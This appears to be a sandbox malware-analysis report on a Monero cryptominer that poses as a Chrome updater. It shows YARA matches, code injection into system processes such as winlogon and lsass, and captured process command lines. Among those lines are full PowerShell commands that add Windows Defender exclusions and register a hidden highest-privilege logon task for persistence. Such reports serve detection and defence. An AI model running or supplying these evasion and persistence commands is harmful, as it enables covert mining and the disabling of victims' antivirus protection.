Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC64BE3C	7_2_00000225DC64BE3C
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC64FEF8	7_2_00000225DC64FEF8
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC64BC30	7_2_00000225DC64BC30
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC642CDC	7_2_00000225DC642CDC
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC681658	7_2_00000225DC681658
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC67B23C	7_2_00000225DC67B23C
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC67F2F8	7_2_00000225DC67F2F8
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC67B030	7_2_00000225DC67B030
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6720DC	7_2_00000225DC6720DC
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6B2258	7_2_00000225DC6B2258
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6ABE3C	7_2_00000225DC6ABE3C
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6AFEF8	7_2_00000225DC6AFEF8
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6ABC30	7_2_00000225DC6ABC30
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6A2CDC	7_2_00000225DC6A2CDC
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AC1658	8_2_00000202C0AC1658
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0ABB23C	8_2_00000202C0ABB23C
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0ABF2F8	8_2_00000202C0ABF2F8
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0ABB030	8_2_00000202C0ABB030
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AB20DC	8_2_00000202C0AB20DC
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AF2258	8_2_00000202C0AF2258
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AEBE3C	8_2_00000202C0AEBE3C
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AEFEF8	8_2_00000202C0AEFEF8
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AEBC30	8_2_00000202C0AEBC30
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AE2CDC	8_2_00000202C0AE2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A6612DF2F8	9_2_000002A6612DF2F8
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A6612E1658	9_2_000002A6612E1658
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A6612DB23C	9_2_000002A6612DB23C
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A6612DB030	9_2_000002A6612DB030
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A6612D20DC	9_2_000002A6612D20DC
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A66130FEF8	9_2_000002A66130FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A661312258	9_2_000002A661312258
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A66130BE3C	9_2_000002A66130BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A66130BC30	9_2_000002A66130BC30
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A661302CDC	9_2_000002A661302CDC
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE26B23C	10_2_000002BAAE26B23C
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE271658	10_2_000002BAAE271658
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE26F2F8	10_2_000002BAAE26F2F8
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE26B030	10_2_000002BAAE26B030
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE2620DC	10_2_000002BAAE2620DC
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE29BE3C	10_2_000002BAAE29BE3C
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE2A2258	10_2_000002BAAE2A2258
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE29FEF8	10_2_000002BAAE29FEF8
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE29BC30	10_2_000002BAAE29BC30
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE292CDC	10_2_000002BAAE292CDC
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAED91658	10_2_000002BAAED91658
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAED8B23C	10_2_000002BAAED8B23C
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAED8F2F8	10_2_000002BAAED8F2F8
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAED8B030	10_2_000002BAAED8B030
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAED820DC	10_2_000002BAAED820DC
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879920DC	11_2_0000026A879920DC
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A8799B030	11_2_0000026A8799B030
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A8799F2F8	11_2_0000026A8799F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A8799B23C	11_2_0000026A8799B23C
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879A1658	11_2_0000026A879A1658
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879C2CDC	11_2_0000026A879C2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879CBC30	11_2_0000026A879CBC30
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879CFEF8	11_2_0000026A879CFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879CBE3C	11_2_0000026A879CBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879D2258	11_2_0000026A879D2258
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953781658	12_2_0000017953781658
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_000001795377B23C	12_2_000001795377B23C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537720DC	12_2_00000179537720DC
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_000001795377B030	12_2_000001795377B030
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_000001795377F2F8	12_2_000001795377F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537B2258	12_2_00000179537B2258
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537ABE3C	12_2_00000179537ABE3C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537A2CDC	12_2_00000179537A2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537ABC30	12_2_00000179537ABC30
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537AFEF8	12_2_00000179537AFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D52258	12_2_0000017953D52258
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D4BE3C	12_2_0000017953D4BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D42CDC	12_2_0000017953D42CDC
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D4BC30	12_2_0000017953D4BC30
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D4FEF8	12_2_0000017953D4FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D541658	13_2_000002295D541658
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D53B23C	13_2_000002295D53B23C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D53F2F8	13_2_000002295D53F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D53B030	13_2_000002295D53B030
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D5320DC	13_2_000002295D5320DC
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D572258	13_2_000002295D572258
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D56BE3C	13_2_000002295D56BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D56FEF8	13_2_000002295D56FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D56BC30	13_2_000002295D56BC30
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D562CDC	13_2_000002295D562CDC
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00000253067E1658	14_2_00000253067E1658
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00000253067DB23C	14_2_00000253067DB23C
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00000253067DF2F8	14_2_00000253067DF2F8
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00000253067DB030	14_2_00000253067DB030
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00000253067D20DC	14_2_00000253067D20DC
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E72258	14_2_0000025306E72258
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E6BE3C	14_2_0000025306E6BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E6FEF8	14_2_0000025306E6FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E62CDC	14_2_0000025306E62CDC
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E6BC30	14_2_0000025306E6BC30
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3BBC30	15_2_000001845B3BBC30
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3B2CDC	15_2_000001845B3B2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3BBE3C	15_2_000001845B3BBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3C2258	15_2_000001845B3C2258
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3BFEF8	15_2_000001845B3BFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD42CDC	16_2_000001ADECD42CDC
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD4BC30	16_2_000001ADECD4BC30
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD4FEF8	16_2_000001ADECD4FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD52258	16_2_000001ADECD52258
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD4BE3C	16_2_000001ADECD4BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D5590420DC	17_2_000001D5590420DC
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55904B030	17_2_000001D55904B030
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55904B23C	17_2_000001D55904B23C
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D559051658	17_2_000001D559051658
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55904F2F8	17_2_000001D55904F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D559072CDC	17_2_000001D559072CDC
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55907BC30	17_2_000001D55907BC30
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55907BE3C	17_2_000001D55907BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D559082258	17_2_000001D559082258
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55907FEF8	17_2_000001D55907FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EB2258	18_2_00000241A9EB2258
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EA2CDC	18_2_00000241A9EA2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EABC30	18_2_00000241A9EABC30
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EAFEF8	18_2_00000241A9EAFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EABE3C	18_2_00000241A9EABE3C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C1AB030	21_2_000002152C1AB030
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C1A20DC	21_2_000002152C1A20DC
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C1AB23C	21_2_000002152C1AB23C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C1B1658	21_2_000002152C1B1658
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C1AF2F8	21_2_000002152C1AF2F8
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3EBC30	21_2_000002152C3EBC30
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3E2CDC	21_2_000002152C3E2CDC
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3F2258	21_2_000002152C3F2258
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3EBE3C	21_2_000002152C3EBE3C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3EFEF8	21_2_000002152C3EFEF8
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C89B030	21_2_000002152C89B030
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C8920DC	21_2_000002152C8920DC
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C89B23C	21_2_000002152C89B23C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C8A1658	21_2_000002152C8A1658
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C89F2F8	21_2_000002152C89F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7316B23C	24_2_000001CD7316B23C
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD73171658	24_2_000001CD73171658
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7316F2F8	24_2_000001CD7316F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7316B030	24_2_000001CD7316B030
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD731620DC	24_2_000001CD731620DC
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7319BE3C	24_2_000001CD7319BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD731A2258	24_2_000001CD731A2258
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7319FEF8	24_2_000001CD7319FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7319BC30	24_2_000001CD7319BC30
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD73192CDC	24_2_000001CD73192CDC
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8620DC	26_2_000002824E8620DC
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E86B23C	26_2_000002824E86B23C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E86F2F8	26_2_000002824E86F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E871658	26_2_000002824E871658
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E86B030	26_2_000002824E86B030
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E892CDC	26_2_000002824E892CDC
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E89BE3C	26_2_000002824E89BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E89FEF8	26_2_000002824E89FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8A2258	26_2_000002824E8A2258
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E89BC30	26_2_000002824E89BC30
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8F2CDC	26_2_000002824E8F2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8FBE3C	26_2_000002824E8FBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8FFEF8	26_2_000002824E8FFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E902258	26_2_000002824E902258
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8FBC30	26_2_000002824E8FBC30
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B473D1658	27_2_0000021B473D1658
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B473CB23C	27_2_0000021B473CB23C
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B473C20DC	27_2_0000021B473C20DC
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B473CB030	27_2_0000021B473CB030
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B473CF2F8	27_2_0000021B473CF2F8
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B42258	27_2_0000021B47B42258
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B3BE3C	27_2_0000021B47B3BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B32CDC	27_2_0000021B47B32CDC
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B3BC30	27_2_0000021B47B3BC30
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B3FEF8	27_2_0000021B47B3FEF8

Source: updater.exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: ylVAEHbMLf.exe	Static PE information: Number of sections : 11 > 10

Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000015.00000002.2005902110.00007FF750F7B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25

Source: classification engine

Classification label: mal100.troj.evad.mine.winEXE@24/79@0/2

Source: C:\Windows\System32\dialer.exe

Code function: 4_2_00007FF78AB32328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,

4_2_00007FF78AB32328

Source: C:\Windows\System32\dialer.exe

Code function: 4_2_00007FF78AB31AC4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,

4_2_00007FF78AB31AC4

Source: C:\Windows\System32\dialer.exe

4_2_00007FF78AB32328

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe

File created: C:\Users\user\AppData\Roaming\Google

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6016:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3288:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2256:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3632:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_03

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe

File created: C:\Users\user\AppData\Local\Temp\yfiogronfirx.tmp

Jump to behavior

Source: ylVAEHbMLf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ylVAEHbMLf.exe

ReversingLabs: Detection: 55%

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe

File read: C:\Users\user\Desktop\ylVAEHbMLf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ylVAEHbMLf.exe "C:\Users\user\Desktop\ylVAEHbMLf.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe	Process created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
